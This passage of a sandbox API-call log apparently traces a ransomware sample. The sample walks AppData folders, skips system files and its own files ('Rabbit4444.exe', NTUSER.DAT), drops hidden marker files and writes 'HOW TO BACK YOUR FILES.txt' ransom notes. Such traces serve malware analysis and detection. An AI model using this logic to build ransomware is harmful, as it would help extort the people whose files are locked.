lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0063.306] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0063.307] WriteFile (in: hFile=0x278, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.310] FlushFileBuffers (hFile=0x278) returned 1 [0063.311] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.311] CloseHandle (hObject=0x278) returned 1 [0063.311] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0063.311] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x123680 [0063.311] RtlInterlockedPushEntrySList (in: ListHead=0xf6750, ListEntry=0x1220c8 | out: ListHead=0xf6750, ListEntry=0x1220c8) returned 0x0 [0063.311] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9776d2f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba130d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9776d2f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0063.311] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.311] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.311] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0063.311] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0063.312] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0063.312] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0063.312] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0063.312] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0063.312] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0063.312] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0063.312] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0063.312] lstrcpyW (in: lpString1=0x130ebd6, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0063.312] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0063.312] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0063.312] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x123500 [0063.312] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x122288 [0063.312] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9776d2f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba1b08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9776d2f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0063.312] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.312] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.312] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0063.312] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0063.312] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0063.312] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0063.312] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0063.312] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0063.312] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0063.312] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0063.312] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0063.312] lstrcpyW (in: lpString1=0x130ebd6, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0063.312] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0063.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122080 [0063.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x122e40 [0063.313] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122088 | out: ListHead=0xf68b0, ListEntry=0x122088) returned 0x121fe8 [0063.313] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9776d2f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba21f0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9776d2f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0063.313] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.313] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.313] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0063.313] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0063.313] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0063.313] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0063.313] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0063.313] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0063.313] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0063.313] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0063.313] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0063.313] lstrcpyW (in: lpString1=0x130ebd6, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0063.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0063.313] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118398 [0063.313] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122088 [0063.313] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9776d2f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba21f0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9776d2f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0063.313] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0063.313] lstrcpyW (in: lpString1=0x130ebd6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.313] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.314] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.314] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.315] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.315] CloseHandle (hObject=0x278) returned 1 [0063.315] CloseHandle (hObject=0x298) returned 1 [0063.315] GetCurrentThreadId () returned 0xd98 [0063.315] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0063.315] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp" [0063.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118398 | out: hHeap=0xe0000) returned 1 [0063.315] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0063.315] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp" [0063.315] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp\\" [0063.315] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0063.315] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.316] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.319] FlushFileBuffers (hFile=0x298) returned 1 [0063.320] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.320] CloseHandle (hObject=0x298) returned 1 [0063.321] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp") returned 83 [0063.321] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.321] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9776d2f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba21f0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef0f64f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0063.321] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.321] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.321] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.321] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.321] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9776d2f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba21f0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef0f64f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.321] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.321] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.321] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.321] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.321] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.321] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef0f64f2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef0f64f2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef0f64f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.321] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.321] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.321] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef0f64f2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef0f64f2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef0f64f2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.321] FindClose (in: hFindFile=0x102b10 | out: hFindFile=0x102b10) returned 1 [0063.321] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.321] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.322] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.322] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.322] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.322] CloseHandle (hObject=0x278) returned 1 [0063.322] CloseHandle (hObject=0x298) returned 1 [0063.322] GetCurrentThreadId () returned 0xd98 [0063.322] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122088 [0063.322] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory" [0063.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122e40 | out: hHeap=0xe0000) returned 1 [0063.322] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122080 | out: hHeap=0xe0000) returned 1 [0063.322] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory" [0063.322] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\" [0063.323] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0063.323] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.323] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.331] FlushFileBuffers (hFile=0x298) returned 1 [0063.331] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.332] CloseHandle (hObject=0x298) returned 1 [0063.332] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory") returned 90 [0063.332] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.332] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9776d2f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba1b08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef11c5de, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0063.332] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.332] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.332] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.332] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.332] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x9776d2f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba1b08, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef11c5de, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.332] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.333] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.333] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.333] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.333] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.333] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef11c5de, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef11c5de, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef11c5de, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.333] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.333] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.333] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef11c5de, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef11c5de, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef11c5de, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.333] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0063.333] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.333] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetHistory\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\inethistory\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.334] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.334] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.334] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.334] CloseHandle (hObject=0x278) returned 1 [0063.334] CloseHandle (hObject=0x298) returned 1 [0063.334] GetCurrentThreadId () returned 0xd98 [0063.334] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fe8 [0063.334] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCookies" [0063.334] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123500 | out: hHeap=0xe0000) returned 1 [0063.334] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 